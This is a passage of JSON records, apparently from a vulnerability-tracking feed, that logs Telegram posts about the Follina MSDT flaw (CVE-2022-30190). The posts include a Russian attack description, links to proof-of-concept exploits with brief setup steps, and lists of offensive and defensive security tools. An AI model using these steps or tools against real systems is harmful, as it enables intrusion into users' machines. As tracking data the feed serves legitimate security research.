\u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b, \u0441\u043e\u0446\u0441\u0435\u0442\u0438, \u0442\u043e\u0440\u0440\u0435\u043d\u0442-\u0440\u0430\u0437\u0434\u0430\u0447\u0438. 
\u0425\u043e\u0442\u044f \u0441\u0430\u043c\u044b\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0432\u0441\u0451 \u0435\u0449\u0451 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f e-mail-\u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u043f\u0440\u043e\u0432\u043e\u0436\u0434\u0430\u044e\u0442\u0441\u044f \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u043e\u0434\u0432\u043e\u0434\u043a\u043e\u0439, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0438\u0432\u043b\u0435\u0447\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440: \u00ab\u0421\u0440\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0439 \u043a\u043e\u043d\u0442\u0440\u0430\u043a\u0442. \u0417\u0430\u0432\u0442\u0440\u0430 \u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u0442\u044c\u00bb.\n\n\u0417\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b, \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434. 
\u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u2014 \u043e\u043d \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0447\u0435\u0440\u0435\u0437 MSDT \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043f\u0440\u043e\u0448\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e, \u0445\u0430\u043a\u0435\u0440 \u0441\u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b, \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c, \u043c\u0435\u043d\u044f\u0442\u044c \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.", "creation_timestamp": "2025-01-14T13:04:32.000000Z"}, {"uuid": "48717c24-0d80-4f80-9ba6-5e0ec9b1679d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/65", "content": "MSDT ZERO-DAY\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190\n\n\ud83c\udfa9WARLOCK DARK ARMY OFFICIALS \ud83c\udfa9\n\n#exploit #zeroday #poc", "creation_timestamp": "2022-09-12T17:53:36.000000Z"}, {"uuid": "33958720-f6a3-4b56-b450-7b50ca966dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3028", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. 
There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&amp;CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. 
\n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-05-20T10:35:54.000000Z"}, {"uuid": "b70d1ebd-f7fb-4933-93ab-8bd938c3762f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/jjC-UMEvYm9WMdGwqx44S7y31oKWh_aFrkGisTJDTDGmWg", "content": "", "creation_timestamp": "2022-06-01T03:13:13.000000Z"}, {"uuid": "f081c6a2-9db3-45d3-a3ee-e63238145c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BABATATASASA/5554", "content": "CVE-2022-30190 - Security Update Guide - Microsoft - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "creation_timestamp": "2023-10-05T19:33:27.000000Z"}, {"uuid": "067549eb-d70b-4199-80b7-0bb8e4873834", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3035", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nResearch:\nhttps://fermatattack.secvuln.info\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions &lt;= 7.13.6 LTS and &lt;= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. 
They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM\n\nhttps://github.com/derco0n/mitigate-folina\n\nResearch:\nhttps://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files &amp; directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. 
It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg", "creation_timestamp": "2023-05-21T09:47:13.000000Z"}, {"uuid": "1adbcb08-ab9b-4789-baa6-c283a5db17d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3124", "content": "AnoMark\n\nThis algorithm is a Machine Learning one, using Natural Language Processing (NLP) techniques based on Markov Chains and n-grams. It offers a way to train a theoretical model on command lines  datasets considered clean. 
Once done it can detect malicious command lines on other datasets.\n\nhttps://github.com/ANSSI-FR/AnoMark\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-32117\n\nIntegrate Google Drive &lt;= 1.1.99 - Missing Authorization via REST API Endpoints.\n\nhttps://github.com/RandomRobbieBF/CVE-2023-32117\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bGeoPincer\n\nA script that leverages OpenStreetMap's Overpass API in order to search for locations. These locations will be queried using a collection of establishments that are somewhat adjacent.\n\nhttps://github.com/tloja/GeoPincer\n\n#OSINT #cybersecurity #infosec\n\n\u200b\u200bAwesome Industrial Protocols\n\nCompilation of industrial network protocols resources focusing on offensive security.\n\n\u2022 You are currently viewing the Awesome Industrial Protocols page.\n\u2022 etailed pages for protocols are available in protocols.\n\u2022 All data is stored in MongoDB databases in db.\n\u2022 Turn/IP (in srcs) is a handy tool to manipulate this data, generate the awesome list and protocol pages, and simplify the research and test process on industrial protocols\n\nhttps://github.com/Orange-Cyberdefense/awesome-industrial-protocols\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-36884-Checker\n\nScript to check for CVE-2023-36884 hardening.\n\nhttps://github.com/tarraschk/CVE-2023-36884-Checker\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bAlcatraz\n\nA x64 binary obfuscator that is able to obfuscate various different pe files including:\n\n\u2022 .exe\n\u2022 .dll\n\u2022 .sys\n\nhttps://github.com/weak1337/Alcatraz\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCobalt Strike BOFs\n\nBeacon object files I made to use with #CobaltStrike.\n\nhttps://github.com/Und3rf10w/CobaltStrikeBOFs\n\n#infosec #pentesting #redteam\n\n\u200b\u200bWindows 11 Exploits\n\nCVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, 
CVE-2022-30190.\n\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bADHunt v2.0\n\nA tool for enumerating Active Directory Enviroments looking for interesting AD objects, vulnerabilities, and misconfigurations. It currently uses a combination ldap queries and available tooling. It was built as a follow up to LinWinPwn.\n\nhttps://github.com/Auto19/ADHunt\n\n#infosec #pentesting #redteam\n\n\u200b\u200bIAMActionHunter\n\nIAMActionHunter is an IAM policy statement parser and query tool aims to simplify the process of collecting and understanding permission policy statements for users and roles in AWS Identity and Access Management (IAM). Although its functionality is straightforward, this tool was developed in response to the need for an efficient solution during day-to-day AWS penetration testing.\n\nhttps://github.com/RhinoSecurityLabs/IAMActionHunter\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bSysPlant\n\nA small implementation in NIM of the currently known syscall hooking methods.\n\nhttps://github.com/x42en/sysplant\n\n#infosec #pentesting #redteam\n\n\u200b\u200bUnshackle\n\nOpen-source tool to bypass windows and linux passwords from bootable usb.\n\nhttps://github.com/Fadi002/unshackle\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCASR\n\nCollect crash reports, triage, and estimate severity.\n\nhttps://github.com/ispras/casr\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-27163\n\nTo assist in enumerating the webserver behind the webserver SSRF.\n\nhttps://github.com/seanrdev/cve-2023-27163\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCS2BR BOF\n\nYou would like to execute BOFs written for #CobaltStrike in #BruteRatel C4? Look no further, we got you covered! CS2BR implements a compatibility-layer that make CS BOFs use the BRC4 API. 
This allows you to use the vast landscape that is BOFs in BRC4.\n\nhttps://github.com/NVISOsecurity/cs2br-bof\n\nDetails:\nhttps://blog.nviso.eu/2023/07/17/introducing-cs2br-pt-ii-one-tool-to-port-them-all/\n \n#infosec #pentesting #redteam\n\n\u200b\u200bhypobrychium\n\nAV/EDR completely ignore me. Duplicate the token of a running process and run a command.\n\nhttps://github.com/foxlox/hypobrychium\n\n#cve #infosec\n\n2/3", "creation_timestamp": "2023-07-22T17:37:23.000000Z"}, {"uuid": "b287b5f2-0ebc-4832-b02b-8c07cbb67373", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2859", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions &lt;= 7.13.6 LTS and &lt;= 7.18.0 \"Latest\". 
This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM (can be deployed via GPP as a startscript or scheduled task)\n\nhttps://github.com/derco0n/mitigate-folina\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files &amp; directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. 
Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg\n\n#cybersecurity #infosec #cybersec", "creation_timestamp": "2023-04-05T13:06:20.000000Z"}, {"uuid": "c01d4dfc-a3f9-4ed9-aea9-ae0458330604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2848", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. 
Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. 
I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. 
It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project, written by pentesters for pentesters, simplifies the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam", "creation_timestamp": "2023-04-04T11:31:24.000000Z"}, {"uuid": "62e403c9-8fbf-41f4-86c4-a36b4867c731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/19273", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "72648e20-dba1-47ee-8390-cbb5d5eeead4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/tUEHTxaKBSTU2Y5sSCh7GbBw134FF8IyhyRditgv_Jo14H8", "content": "", "creation_timestamp": "2023-06-16T08:27:34.000000Z"}, {"uuid": "225b04ff-b0d0-4bb0-8047-319bde00b3ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/xytonicweb/124", "content": "Microsoft Office RCE - \u201cFollina\u201d MSDT Attack\n\nCVE-2022-30190\n\nhttps://github.com/JohnHammond/msdt-follina", "creation_timestamp": "2022-06-03T05:48:10.000000Z"}, {"uuid": "aef46227-8dca-4211-a659-c9d86f4948bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": 
